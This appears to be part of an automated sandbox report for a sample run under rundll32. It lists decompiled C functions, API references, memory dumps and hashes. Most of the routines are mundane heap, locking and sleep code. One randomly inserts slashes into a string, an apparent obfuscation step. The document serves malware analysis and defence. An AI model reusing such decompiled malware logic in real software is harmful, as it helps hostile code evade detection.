Part of subcall function 00C23D85: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00C2755B,?,?,?,?,?,00C2519C,?), ref: 00C23E87

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 312686442f2d46585d990fa6052e734f5c5e820866b2ae74e2ec7ef5af566e18
Instruction ID: e036f2738effb52ef007b12e203f3eecda3b99c047de51ded4986f3844e68edb
Opcode Fuzzy Hash: 312686442f2d46585d990fa6052e734f5c5e820866b2ae74e2ec7ef5af566e18
Instruction Fuzzy Hash: B9219572D04239ABCB20EFE4A8C59EEB379AB48350F154535FA21A7900DB34DE4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 7034A9C7, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 70340224: _free.LIBCMT ref: 70340232

Part of subcall function 7034A6EF: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,00000000,?4p,?,?,?,00000000,?,70343D59,0000FDE9,00000000,?), ref: 7034A791

GetLastError.KERNEL32 ref: 7034AA2F
__dosmaperr.LIBCMT ref: 7034AA36
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 7034AA75
__dosmaperr.LIBCMT ref: 7034AA7C

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: b4aeb62987c1116659f6653e630b21b94cac70cb8a3ab9fb5cd1b23003903277
Instruction ID: ed56792345ed15910c52e27c3fed17d1de90e80eb588cececdca069dc7f2cbf4
Opcode Fuzzy Hash: b4aeb62987c1116659f6653e630b21b94cac70cb8a3ab9fb5cd1b23003903277
Instruction Fuzzy Hash: B621C171604A09AFDB129F658D8193FB7EDEF04264711A928F87A9F150E731FC418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 703449B1, Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4974995529b84f47ea0d769d55f4b030adaa8bf2a4630dbd84855cb5c3e92d7
Instruction ID: 91f0f799a41967e95d2f73157c7070cb2f019142f8bb835839dfa8e3d37aaa71
Opcode Fuzzy Hash: b4974995529b84f47ea0d769d55f4b030adaa8bf2a4630dbd84855cb5c3e92d7
Instruction Fuzzy Hash: 1521D832A81210ABE7128B258C81B6E37FD9B45760F226534FD56AF290E7B0ED00C5E4

Uniqueness

Uniqueness Score: -1.00%

Function 00C23AD2, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00C23AD2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00C25FBC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00c23ade
0x00c23ae2
0x00c23ae3
0x00c23ae4
0x00c23ae6
0x00c23ae8
0x00c23aed
0x00c23af0
0x00c23b87
0x00c23b8e
0x00c23b8e
0x00c23af9
0x00c23b00
0x00c23b10
0x00c23b10
0x00c23b16
0x00c23b18
0x00c23b1d
0x00c23b26
0x00c23b2e
0x00c23b31
0x00c23b3c
0x00c23b40
0x00c23b42
0x00c23b43
0x00c23b4c
0x00c23b50
0x00c23b61
0x00c23b52
0x00c23b57
0x00c23b5c
0x00c23b6b
0x00c23b6b
0x00c23b40
0x00c23b71
0x00c23b77
0x00c23b77
0x00c23b80
0x00c23b85
0x00c23b85
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00C23B00
lstrlenW.KERNEL32(?), ref: 00C23B36
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00C23B57
SysFreeString.OLEAUT32(?), ref: 00C23B6B

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: d262d2051a3526f31be05a5ddba716384d5b0b697e5df44c6a8de7014c5e0931
Instruction ID: cab8e523194f13679afda27bddbd6624440c589e8b8255b8915713363cb31c58
Opcode Fuzzy Hash: d262d2051a3526f31be05a5ddba716384d5b0b697e5df44c6a8de7014c5e0931
Instruction Fuzzy Hash: D4213D75A00259EFCB10DFA8D889E9EBBB8FF49314B108169E915E7610EB34DB41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 70344589, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
_free.LIBCMT ref: 703445EB
_free.LIBCMT ref: 70344621
SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 19a4175a99cb96fd6aa66c20c44a37325685ef2dc1201ad9201167dd05de6e93
Instruction ID: 074ce3664b08574113b902fe0ed6a90bb81be7416bd6505ea23c54ada80916c1
Opcode Fuzzy Hash: 19a4175a99cb96fd6aa66c20c44a37325685ef2dc1201ad9201167dd05de6e93
Instruction Fuzzy Hash: D11186332106117FFB0226B56CC5A3E35EDAFC2975B362678F5259F1E1EEE59C028124

Uniqueness

Uniqueness Score: -1.00%

Function 703446E0, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,70341018,70341996,?,?,7033F811,00000000), ref: 703446E5
_free.LIBCMT ref: 70344742
_free.LIBCMT ref: 70344778
SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70341018,70341996,?,?,7033F811,00000000), ref: 70344783

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a487db82cbf4e6aebf1584a8e04fe170b0b0ce0fe6b230d6f7851b613b838b1e
Instruction ID: 6044c7c3a1f25797774601df526e71573ddac372294011bceee45bf498a6e597
Opcode Fuzzy Hash: a487db82cbf4e6aebf1584a8e04fe170b0b0ce0fe6b230d6f7851b613b838b1e
Instruction Fuzzy Hash: 781156332156117EF70116B56CC5E3E35DDABC2A75B352238F5399F1E1DBA59C038124

Uniqueness

Uniqueness Score: -1.00%

Function 00C24FE5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C24FE5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xc2a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xc2a2a8; // 0xf9de104a
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xc2a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00c24fed
0x00c24ff0
0x00c24ff6
0x00c2500e
0x00c25012
0x00c25015
0x00c25017
0x00c2501a
0x00c2501c
0x00c2501f
0x00c25021
0x00c25021
0x00c25023
0x00c2502e
0x00c25033
0x00c25044
0x00c2504c
0x00c25051
0x00c25054
0x00c25057
0x00c25059
0x00c2505f
0x00c25062
0x00c25062
0x00c25062
0x00c2506d
0x00c25072
0x00c2507c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C271E9,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C24FF0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C25008
memcpy.NTDLL(00000000,050C9630,-00000008,?,?,?,00C271E9,00000000,?,00000000,00C24A9F,00000000,050C9630), ref: 00C2504C
memcpy.NTDLL(00000001,050C9630,00000001,00C24A9F,00000000,050C9630), ref: 00C2506D

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: ab2ebe00240fe0e001f1a8dc6d8aff5ce5c73b5a376badbb5510d11246a8aae8
Instruction ID: 7d7c2ae9df91aaa88e4db48ab12ee6bc98903162be112241cedd21b30b05f26f
Opcode Fuzzy Hash: ab2ebe00240fe0e001f1a8dc6d8aff5ce5c73b5a376badbb5510d11246a8aae8
Instruction Fuzzy Hash: D7110672A10218BFD7208B69EC85F9EBBBEEB84350F150166F508D7560EA719E01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 70347792, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,70340D5A,?,?), ref: 703477CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,70340D5A,?,?), ref: 703477D9
__dosmaperr.LIBCMT ref: 703477E0
SetFileAttributesW.KERNEL32(?,?), ref: 703477FE

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: AttributesFile$ErrorLast__dosmaperr
String ID:
API String ID: 2189404394-0
Opcode ID: e239b77e7d521a87cb1ca2226deb6dde5a9f4a355e797f99f0d6a19e272c940a
Instruction ID: 3ea6d250d8f5de3baed9d7b8dc72f428f13296cba769e962e5db566cf6302a2c
Opcode Fuzzy Hash: e239b77e7d521a87cb1ca2226deb6dde5a9f4a355e797f99f0d6a19e272c940a
Instruction Fuzzy Hash: E7018031A106089FD711DB758845BBE3BEC9F09632BA12158F821EE180DB74E9419AA1

Uniqueness

Uniqueness Score: -1.00%

Function 7034F601, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,7034C051,?,00000001,?,?,?,70343A2F,00000000,?,?), ref: 7034F618
GetLastError.KERNEL32(?,7034C051,?,00000001,?,?,?,70343A2F,00000000,?,?,00000000,?,?,70343F83,00000020), ref: 7034F624

Part of subcall function 7034F5EA: CloseHandle.KERNEL32(7038C970,7034F634,?,7034C051,?,00000001,?,?,?,70343A2F,00000000,?,?,00000000,?), ref: 7034F5FA

___initconout.LIBCMT ref: 7034F634

Part of subcall function 7034F5AC: CreateFileW.KERNEL32(7037F890,40000000,00000003,00000000,00000003,00000000,00000000,7034F5DB,7034C03E,?,?,70343A2F,00000000,?,?,00000000), ref: 7034F5BF

WriteConsoleW.KERNEL32(?,?,?,00000000,?,7034C051,?,00000001,?,?,?,70343A2F,00000000,?,?,00000000), ref: 7034F649

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 343d736b2bf4f4d0ba0b102e38c1ab9175ac2b8d66c5890117d4d2382c45e57a
Instruction ID: 3a93f1fc08ceaba9fc1bba5673d98ef16e22e3a4ea030cfa147428eed8f52349
Opcode Fuzzy Hash: 343d736b2bf4f4d0ba0b102e38c1ab9175ac2b8d66c5890117d4d2382c45e57a
Instruction Fuzzy Hash: 9CF01237501114BFCF122FD6DC04A9D7F6AEB09361B166091FA0999130C731D860DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C2566B, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C2566B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xc2a2c4; // 0x2f0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xc2a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xc2a2c4; // 0x2f0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xc2a290; // 0x4cd0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00c2566b
0x00c25672
0x00c256bc
0x00c256be
0x00c256be
0x00c25676
0x00c2567c
0x00c25681
0x00c25685
0x00c2568b
0x00c25692
0x00000000
0x00000000
0x00c25694
0x00c25699
0x00000000
0x00000000
0x00000000
0x00c25699
0x00c2569b
0x00c256a3
0x00c256a6
0x00c256a6
0x00c256ac
0x00c256b3
0x00c256b6
0x00c256b6
0x00000000

APIs

SetEvent.KERNEL32(000002F0,00000001,00C26991), ref: 00C25676
SleepEx.KERNEL32(00000064,00000001), ref: 00C25685
CloseHandle.KERNEL32(000002F0), ref: 00C256A6
HeapDestroy.KERNEL32(04CD0000), ref: 00C256B6

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 06098f9614384760e9fcd0cd4c920c3fd55d6b15b9261fa1f2353d8ec647f2f8
Instruction ID: 05030013bd4b74cfcd9ce726060ba26573bdf886f9c11ff85f607e5db0a32f5b
Opcode Fuzzy Hash: 06098f9614384760e9fcd0cd4c920c3fd55d6b15b9261fa1f2353d8ec647f2f8
Instruction Fuzzy Hash: F0F030B1B217269BEB30AB35AC4CB4F3BA9EB08B11B450114BC15E3EA1DB34CD028555

Uniqueness

Uniqueness Score: -1.00%

Function 00C24013, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C24013(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xc2a37c; // 0x50c9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xc2a37c; // 0x50c9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xc2a030) {
					HeapFree( *0xc2a290, 0, _t8);
				}
				_t13[1] = E00C238DA(_v0, _t13);
				_t10 =  *0xc2a37c; // 0x50c9630
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x00c24013
0x00c24013
0x00c2401c
0x00c2402c
0x00c2402c
0x00c24031
0x00c24036
0x00000000
0x00000000
0x00c24026
0x00c24026
0x00c24038
0x00c2403c
0x00c2404e
0x00c2404e
0x00c2405e
0x00c24061
0x00c24066
0x00c2406a
0x00c24070

APIs

RtlEnterCriticalSection.NTDLL(050C95F0), ref: 00C2401C
Sleep.KERNEL32(0000000A,?,?,00C24540,?,?,?,?,?,00C268F7,?,00000001), ref: 00C24026
HeapFree.KERNEL32(00000000,00000000,?,?,00C24540,?,?,?,?,?,00C268F7,?,00000001), ref: 00C2404E
RtlLeaveCriticalSection.NTDLL(050C95F0), ref: 00C2406A

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 63c136cdd79c14e63ca3a3276c7f429e1efe25e8a613a8d5e6008640a48c1e8b
Instruction ID: b6790815fc8097cd06f31c14b300bf229ee7843da1e0b234df1d028062de4b44
Opcode Fuzzy Hash: 63c136cdd79c14e63ca3a3276c7f429e1efe25e8a613a8d5e6008640a48c1e8b
Instruction Fuzzy Hash: D2F0FE70210255DBEB34DB79FC48F1A3BA4EB08741B148414F656D6AB1C730D946DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00C2152E, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C2152E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xc2a37c; // 0x50c9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xc2a37c; // 0x50c9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xc2a37c; // 0x50c9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xc2b85e) {
					HeapFree( *0xc2a290, 0, _t10);
					_t7 =  *0xc2a37c; // 0x50c9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00c2152e
0x00c21537
0x00c21547
0x00c21547
0x00c2154c
0x00c21551
0x00000000
0x00000000
0x00c21541
0x00c21541
0x00c21553
0x00c21558
0x00c2155c
0x00c2156f
0x00c21575
0x00c21575
0x00c2157e
0x00c21580
0x00c21584
0x00c2158a

APIs

RtlEnterCriticalSection.NTDLL(050C95F0), ref: 00C21537
Sleep.KERNEL32(0000000A,?,?,00C24540,?,?,?,?,?,00C268F7,?,00000001), ref: 00C21541
HeapFree.KERNEL32(00000000,?,?,?,00C24540,?,?,?,?,?,00C268F7,?,00000001), ref: 00C2156F
RtlLeaveCriticalSection.NTDLL(050C95F0), ref: 00C21584

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: d97d91af0cf4d8ac6a3fff78a369d33ce9cec5da7316bd0bd9c064701aa0de6a
Instruction ID: 843eca7be96781a60931e97df3a7cdd390c7dd930cd4722c240564f905112d19
Opcode Fuzzy Hash: d97d91af0cf4d8ac6a3fff78a369d33ce9cec5da7316bd0bd9c064701aa0de6a
Instruction Fuzzy Hash: A0F0D4B4220215DBEB28CF25EC89B2D37A5EB58701B084069F91787B70C730ED02DA26

Uniqueness

Uniqueness Score: -1.00%

Function 70342E83, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 70342E8C

Part of subcall function 70341970: HeapFree.KERNEL32(00000000,00000000,?,7033F811,00000000), ref: 70341986
Part of subcall function 70341970: GetLastError.KERNEL32(?,?,7033F811,00000000), ref: 70341998

_free.LIBCMT ref: 70342E9F
_free.LIBCMT ref: 70342EB0
_free.LIBCMT ref: 70342EC1

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c79d05c451c2fa4bdfab15ce41135f1b8e0b018ed0feb5f8269ce5d296d14fd1
Instruction ID: a1abba29600ea2e1b59d45ff9652d7d21d33b7b82244df9ec597586310826789
Opcode Fuzzy Hash: c79d05c451c2fa4bdfab15ce41135f1b8e0b018ed0feb5f8269ce5d296d14fd1
Instruction Fuzzy Hash: 45E04677808A20EEC6021F62AC11A193BBDBB05A603361086F0200B7B0C7396292DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 70351F6E, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(70380260,C:\Windows\system32,0000069D), ref: 70352151

Strings

C:\Windows\system32, xrefs: 70352147
9, xrefs: 70352105

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: EnvironmentVariable
String ID: 9$C:\Windows\system32
API String ID: 1431749950-92765678
Opcode ID: ff31f55a9455eca76b69fd45112de679e65961cbbdcfe22d4ef86dc0e3282ffb
Instruction ID: 17e9ee7185685bb2626b78e4af20f15464be0477ed25d0f517d83d3c72b1fee4
Opcode Fuzzy Hash: ff31f55a9455eca76b69fd45112de679e65961cbbdcfe22d4ef86dc0e3282ffb
Instruction Fuzzy Hash: A0F18F729153518FC701CF3AD880B1ABBE5FB89314F2506EEE499E72A5D3349948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 70341DBD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 70341E4D

Strings

pow, xrefs: 70341E25, 70341E42

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: fe69b881d403525c45ef29a38052fa4975cbf9d601d90dd2c6bed568b789fa89
Instruction ID: a90021279949a454777ab64c17253421eab44eb82a0d4384571096d1ca0cb5e3
Opcode Fuzzy Hash: fe69b881d403525c45ef29a38052fa4975cbf9d601d90dd2c6bed568b789fa89
Instruction Fuzzy Hash: 79517E66908D018AC7026B11CA4537E37FC9B40701F717A5DF4E74E3E8EB748CD59A46

Uniqueness

Uniqueness Score: -1.00%

Function 70342598, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 703425DB, 703425E2, 70342618

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 549df9b8dc08ba1aaec0d175a9101b45393b1a141ff9334f568aba422bb61cd0
Instruction ID: 855e08f40005b255d61a0bdeb40a1533495d713e8a93cd0cc892254827cf5150
Opcode Fuzzy Hash: 549df9b8dc08ba1aaec0d175a9101b45393b1a141ff9334f568aba422bb61cd0
Instruction Fuzzy Hash: CF414471A00214AFC712DF99D981DAEBBFDEB85310F62105AF405AF250E7B59E41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 7034B528, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 7034B2D1: GetOEMCP.KERNEL32(00000000,7034B543,?,?,?), ref: 7034B2FC

_free.LIBCMT ref: 7034B5A0

Strings

8 h, xrefs: 7034B637

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: _free
String ID: 8 h
API String ID: 269201875-64266482
Opcode ID: 2dd181fc9cbfdb49479c2033647db33632ba8725387969f61b3f135a3ecd95ed
Instruction ID: 52b39486388afae528b6500d9d5dc81fef9c6ba3f4b1c65e3601ba1b3a0a8111
Opcode Fuzzy Hash: 2dd181fc9cbfdb49479c2033647db33632ba8725387969f61b3f135a3ecd95ed
Instruction Fuzzy Hash: 37317072900349AFCB01DFA8C841AAEBBF5EF45310F215499F9159F2A0EB71ED51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 70347652, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 7034769E
GetFileType.KERNEL32(00000000), ref: 703476B0

Strings

`"h, xrefs: 703476E5

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: FileHandleType
String ID: `"h
API String ID: 3000768030-1397603704
Opcode ID: 2b0838a091047bc4568d6c357d42ff23abb60f80d942e81eb812c63f37583dd2
